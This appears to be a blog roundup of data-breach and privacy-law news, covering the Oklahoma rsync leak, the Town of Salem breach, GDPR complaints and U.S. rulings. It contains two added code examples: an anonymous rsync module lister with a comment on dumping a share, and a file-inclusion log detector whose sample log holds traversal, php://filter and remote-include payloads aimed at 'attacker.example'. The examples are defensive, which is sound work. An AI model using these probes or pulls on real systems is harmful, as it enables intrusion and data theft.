Oklahoma Government Suffers Massive Data Leak

Another massive data leak has been discovered.

This latest leak involves an open Oklahoma Department of Securities storage server exposing millions of records, including confidential files linked to FBI investigations, 17 years of email archives and thousands of Social Security numbers.

The exposure was discovered by a researcher at cybersecurity firm UpGuard while scanning the internet with Shodan, a search engine that indexes internet-connected devices and services (webcams, routers, servers and so on) and lets users filter results by port, service banner, organization and other attributes.

The data was exposed through an rsync service that required no authentication. rsync is a utility for synchronizing files between systems; when run as a daemon it serves its directories over the network (by default on TCP port 873), and unless it is configured to restrict client hosts or require credentials, anyone who can reach it can list and download what it exports. The server's IP address was registered to the Oklahoma Office of Management and Enterprise Services, and anyone who found it could download the publicly accessible files stored there.
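The following is an added example, not code from the article or from UpGuard, showing the two checks a practitioner would run on a daemon like the one above: the anonymous module-listing exchange an rsync client performs (the same thing `rsync rsync://HOST/` does, so the probe needs no credentials), and an audit of an rsyncd.conf for modules exported with neither a host restriction nor authentication. The hostnames, the two configuration files and the daemon reply in the comments are constructed for illustration; the only assumption about the target is that the daemon listens on TCP 873.

```python
"""Added example, not from the article or from UpGuard: two checks against an
rsync daemon of the kind described above (hostnames and configs constructed).
list_rsync_modules() does the anonymous module-listing exchange an rsync client
performs for `rsync rsync://HOST/`: read the greeting, send our own
"@RSYNCD: <version>" line, send "#list", read until "@RSYNCD: EXIT". A listed
module can usually be pulled with `rsync -av rsync://HOST/MODULE/ ./dump/`.
audit_rsyncd_conf() flags modules in an rsyncd.conf that have neither a
"hosts allow" restriction nor "auth users". Assumes the daemon is on TCP 873.
"""
import socket

RSYNC_PORT = 873
CLIENT_GREETING = b"@RSYNCD: 31.0\n"  # protocol version this client announces


def parse_module_listing(raw: bytes) -> dict:
    """{module: comment} from the daemon's "name<TAB>comment" lines. Protocol
    and @ERROR lines are skipped; a daemon motd would land here too, so treat
    the names as candidates to verify rather than ground truth."""
    modules = {}
    for line in raw.decode("utf-8", errors="replace").splitlines():
        if line.startswith("@RSYNCD:") or line.startswith("@ERROR"):
            continue
        name, _, comment = line.partition("\t")
        if name.strip():
            modules[name.strip()] = comment.strip()
    return modules


def list_rsync_modules(host: str, port: int = RSYNC_PORT, timeout: float = 5.0) -> dict:
    """Connect to a daemon and request its module list with no credentials."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        fh = sock.makefile("rwb")
        greeting = fh.readline()  # e.g. b"@RSYNCD: 31.0\n"
        if not greeting.startswith(b"@RSYNCD:"):
            raise RuntimeError("not an rsync daemon: %r" % greeting)
        fh.write(CLIENT_GREETING)
        fh.write(b"#list\n")  # an empty line requests the listing as well
        fh.flush()
        reply = []
        while True:
            line = fh.readline()
            if not line:
                break
            reply.append(line)
            if line.startswith(b"@RSYNCD: EXIT"):
                break
    return parse_module_listing(b"".join(reply))


def parse_rsyncd_conf(text: str) -> dict:
    """Minimal rsyncd.conf parser: {"": globals, "<module>": params}, keys
    lower-cased; '#'/';' comments and blank lines ignored."""
    sections, current = {"": {}}, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_rsyncd_conf(text: str) -> list:
    """Findings for modules anyone can reach. Module params override globals
    (as rsync resolves them); rsync defaults: no "hosts allow" = all hosts,
    no "auth users" = anonymous, "read only" = true."""
    sections = parse_rsyncd_conf(text)
    findings = []
    for name, params in sections.items():
        if name == "":
            continue
        eff = {**sections[""], **params}
        if not eff.get("hosts allow") and not eff.get("auth users"):
            findings.append(f"[{name}]: no 'hosts allow' and no 'auth users' (anonymous, unrestricted)")
        if eff.get("read only", "true").lower() in ("false", "no", "0"):
            findings.append(f"[{name}]: 'read only = false' allows uploads")
    return findings


# Constructed configs: WEAK_CONF exports /srv/share to anyone who reaches port 873;
# HARDENED_CONF limits it to one network and to a named, password-checked user.
WEAK_CONF = """
uid = nobody
[share]
    path = /srv/share
    comment = department share
"""
HARDENED_CONF = """
uid = nobody
hosts allow = 10.20.0.0/16
[share]
    path = /srv/share
    comment = department share
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    read only = true
"""
```

Running `audit_rsyncd_conf(WEAK_CONF)` reports the anonymous, unrestricted module; the hardened variant reports nothing because `hosts allow` at global scope applies to every module and `auth users` plus a `secrets file` require a password. Whichever of those you adopt, the daemon should not be reachable from the internet at all: bind it to an internal address or firewall port 873, and keep `read only = true` unless uploads are genuinely needed. `list_rsync_modules("HOST")` is the external check; if it returns anything for a host you own, the share is listable by anyone.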

GDPR Complaints Filed Against Netflix & Amazon

Video streaming leaders including Netflix, Amazon and Apple have been accused of breaking the EU's data protection rules.

The General Data Protection Regulation (GDPR) gives individuals in the EU the right to obtain a copy of the personal data companies hold about them (the right of access). However, Max Schrems' privacy group NOYB (None Of Your Business) says it found that most of the big streaming companies have not fully complied, and has filed formal complaints which, if upheld, could result in substantial fines for the streaming giants.

Lack of Compliance

After GDPR went into effect in May 2018, many of the biggest names in tech including Amazon, Apple, Google and Spotify began allowing customers to download a copy of their data. NOYB, however, has said it found many of these streaming industry leaders did not do enough to comply with the new law.

Australian Parliament Hacked!

Australia's parliament had to reset its computer network passwords after an unknown attacker attempted to break into its systems, according to a Reuters report.

As stated in the report, both Tony Smith, the speaker of the lower House of Representatives, and Scott Ryan, president of the upper house Senate, said there’s no evidence that any data had been accessed or stolen.

No Stolen Data

“We have no evidence that this is an attempt to influence the outcome of parliamentary processes or to disrupt or influence electoral or political processes,” Smith and Ryan responded in a joint statement.

“Accurate attribution of a cyber incident takes time and investigations are being undertaken in conjunction with the relevant security agencies.”

Canada’s New Consent Guidelines are Effective Now!

Consent is an important element in privacy law.

Last year, Canadian officials jointly issued guidelines on how to obtain meaningful consent under Canada’s Personal Information Protection and Electronic Documents Act (PIPEDA) which generally requires that you obtain meaningful consent for the collection, use and disclosure of personal information.

The guidelines outline seven principles for obtaining meaningful consent.

  1. Emphasize key elements

Organizations must allow individuals to quickly and easily review key elements affecting their privacy decisions early in the process. Key elements include what information is being collected, why it is being collected and who it is shared with.

Massachusetts Adds New Requirements to Breach Notification Law

Massachusetts Governor Charlie Baker recently signed a new law that amends the state’s data breach notification law.

“The improvements made to Massachusetts laws in this legislation are necessary to protect consumers from the consequences of data breaches that could expose personal information and to give consumers more control over their data and how it is used,” Governor Baker tweeted.

Key New Provisions include: Continue reading Massachusetts Adds New Requirements to Breach Notification Law

Popular Online Game ‘Town of Salem’ Suffers Data Breach Exposing 7.6 Million Players

A data breach at BlankMediaGames (BMG) has affected more than 7.6 million players of Town of Salem, a browser-based online role-playing game.

The Discovery

The incident was disclosed on December 28 to cybersecurity company DeHashed, which received an anonymous email containing evidence of server and database access.

DeHashed says affected data includes usernames, emails, passwords, IP addresses, game and forum activity, and payment information. Some users who paid for features also had billing data compromised.

The Breach

DeHashed said the attackers exploited a local/remote file inclusion (LFI/RFI) flaw. That class of bug lets a request parameter control which file a PHP application includes, so an attacker can make the server load a local file it should never expose or, where remote includes are enabled, a file hosted on a machine they control, and execute the code it contains; here it was used to run malicious code on a web server running PHP.

The attackers then gained unauthorized access to the complete gamer database which contained 7,633,234 unique email addresses (most were Gmail, Hotmail, and Yahoo.com email accounts).
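The following is an added example, not code from the article or from DeHashed or BlankMediaGames, and it does not reproduce the Town of Salem intrusion. It shows what the inclusion bug class looks like in PHP and what attempts to exploit it look like in a web server access log, as detection logic a security operations team could run over their own logs. The log lines, client IPs, the `attacker.example` host and the `page` parameter name are all constructed for illustration.

```python
"""Added example, not from the article or from DeHashed/BlankMediaGames: a
detector for the request patterns behind local/remote file inclusion (LFI/RFI)
probes, run over constructed Apache combined-format access log lines. It does
not reproduce the Town of Salem intrusion; it shows what an inclusion bug looks
like in PHP and what attempts against it look like in the web server log.

Vulnerable shape, an include() that trusts a request parameter:
    include($_GET['page'] . '.php');
Payloads seen in logs: ../ traversal to local files, PHP stream wrappers
(php://, data:, expect://), remote URLs (only work with allow_url_include=On),
and %00 to cut off an appended suffix on old PHP. All IPs, hosts and log lines
below are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit, unquote

# Apache "combined" format; only the client IP and the request target are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Checked against the decoded parameter value, in this order.
INDICATORS = [
    ("traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    ("absolute_path", re.compile(r"^/(etc|proc|var|usr|windows)/", re.I)),
    ("php_wrapper", re.compile(r"^(?:(?:php|phar|expect|zip|glob|file)://|data:)", re.I)),
    ("remote_url", re.compile(r"^(?:https?|ftp)://", re.I)),
    ("null_byte", re.compile("\x00")),
]


def inclusion_indicators(value: str) -> list:
    """Names of the indicators matched by one parameter value. parse_qsl has
    already decoded once; decoding twice more catches double/triple-encoded
    payloads such as %252e%252e%252f."""
    decoded = unquote(unquote(value))
    return [name for name, pat in INDICATORS if pat.search(decoded)]


def analyse_log_line(line: str):
    """(ip, path, {param: [indicators]}) for one log line, None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    flagged = {}
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        hits = inclusion_indicators(value)
        if hits:
            flagged[key] = hits
    return m.group("ip"), target.path, flagged


def scan_log(text: str) -> dict:
    """Flagged requests grouped by client: {ip: [(path, {param: [indicators]})]}."""
    by_ip = {}
    for line in text.splitlines():
        parsed = analyse_log_line(line)
        if parsed and parsed[2]:
            ip, path, flagged = parsed
            by_ip.setdefault(ip, []).append((path, flagged))
    return by_ip


# Constructed log: one benign request, then four probes from a second client.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Dec/2018:10:01:12 +0000] "GET /index.php?page=home HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Dec/2018:10:01:40 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1842 "-" "curl/7.61.0"
203.0.113.9 - - [28/Dec/2018:10:02:03 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 2210 "-" "curl/7.61.0"
203.0.113.9 - - [28/Dec/2018:10:02:31 +0000] "GET /index.php?page=http://attacker.example/shell.txt HTTP/1.1" 500 311 "-" "curl/7.61.0"
203.0.113.9 - - [28/Dec/2018:10:03:05 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd%2500 HTTP/1.1" 200 1842 "-" "curl/7.61.0"
"""

if __name__ == "__main__":
    for ip, requests in scan_log(SAMPLE_LOG).items():
        for path, flagged in requests:
            print(ip, path, flagged)
</```

`scan_log(SAMPLE_LOG)` returns nothing for the benign client and four flagged requests for 203.0.113.9: a traversal probe, a `php://filter` read (which returns source code base64-encoded rather than executing it, a common way to pull configuration files containing database credentials), a remote include, and a double-encoded traversal with a null byte. A 200 status on a probe like the first is the signal to escalate. On the application side the fix is not to filter these strings but to stop passing user input to include() at all: map the parameter to a fixed allowlist of page names, keep `allow_url_include` off, and constrain the process with `open_basedir`.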

BMG’s Response

A BlankMediaGames developer named Achilles responded on the Town of Salem forums that no credit-card numbers were stolen. Further, Achilles wrote, all passwords were hashed and not stored in plain text.

“The only important data compromised would be your Username/hashed password, IP and email,” Achilles wrote. “Everything else is just game related data.”

Moving Forward

Data is becoming a much larger issue for game developers; just last month, Bethesda Game Studios came under fire for a bug that leaked player information from support tickets.

If you’ve played Town of Salem, change your password immediately, and change it on any other site where you used the same one: hashed passwords can still be cracked offline, and leaked credentials are routinely tried against other services.

German Hacker Uses Twitter to Leak Personal Data of German Politicians

A 20-year-old hacker has been using Twitter to leak private details belonging to hundreds of German politicians, celebrities and public figures, including German Chancellor Angela Merkel.

The Twitter Dump

Over several weeks last December, a Twitter account run by an individual calling themselves “G0d”, later identified as a 20-year-old German student, posted links to the sensitive information, which included email addresses, phone numbers and personal chats. The dump was only widely noticed on January 3rd, when a German publication reported on it.

The account, which was quickly shut down, had more than 18,000 followers and described its activities as “security researching” and “satire and irony”. Google and Bitly also pulled the plug on the blogs and links the hacker had used to host files containing the information.

A Data Breach Can Cost a Small Business $2.5 Million

SMBs are attractive targets for cybercriminals because they typically have smaller cybersecurity budgets and may lack an internal security team dedicated to discovering and responding to attacks quickly. Critically, they may also lack the resources to train employees to recognise preventable attacks such as phishing campaigns.

The Cisco Report

Late last year, Cisco published a special cybersecurity report, Cisco’s SMB Cybersecurity Report (the Report), on how cyberattacks affect SMBs. The Report draws on 1,816 survey respondents from 26 countries.

When surveyed, respondents listed these as the most concerning threats.

  • Targeted employee attacks (BEC and phishing)
  • Advanced persistent threats (new malware)
  • Ransomware

Employers Have a Legal Duty to Protect Employee Data

The cybersecurity standard of care is getting clearer: if you collect sensitive data, you must take reasonable measures to protect it.

Recently, in Dittman v. UPMC, the Pennsylvania Supreme Court ruled that an employer has a common law duty to use reasonable care to safeguard its employees’ personal information stored on an internet-accessible computer. This decision paves the way for a much broader application because the case was decided based on the mere act of collecting and storing sensitive information (and not the employer/employee context).

The Facts

The case relates to a data breach of the University of Pittsburgh Medical Center’s (UPMC) network and the theft of sensitive personal information belonging to more than 60,000 employees (e.g., Social Security numbers, confidential tax information, and bank account information). The employees sued but lost in the trial court, which held that Pennsylvania law did not recognize a duty to secure employee data stored on internet-accessible computers.

HHS Publishes Cybersecurity Best Practice Guide

The U.S. Department of Health and Human Services (HHS) recently published voluntary cybersecurity best practices entitled “Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients” (Best Practice Guide). These best practices were compiled over a two-year period by 150 cybersecurity and healthcare experts from both the public and private sector and are a cybersecurity roadmap for healthcare organizations of all types and sizes, from small local clinics to large regional hospital systems.

All entities, especially those in the healthcare field, can learn from this valuable resource.

The Four-Part Best Practice Guide

The Best Practice Guide has four parts: a main document (Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients), two technical volumes, and a set of resources and templates. Its goal is to raise awareness, provide sound practices, and consistently mitigate the most damaging cybersecurity threats facing the healthcare industry today.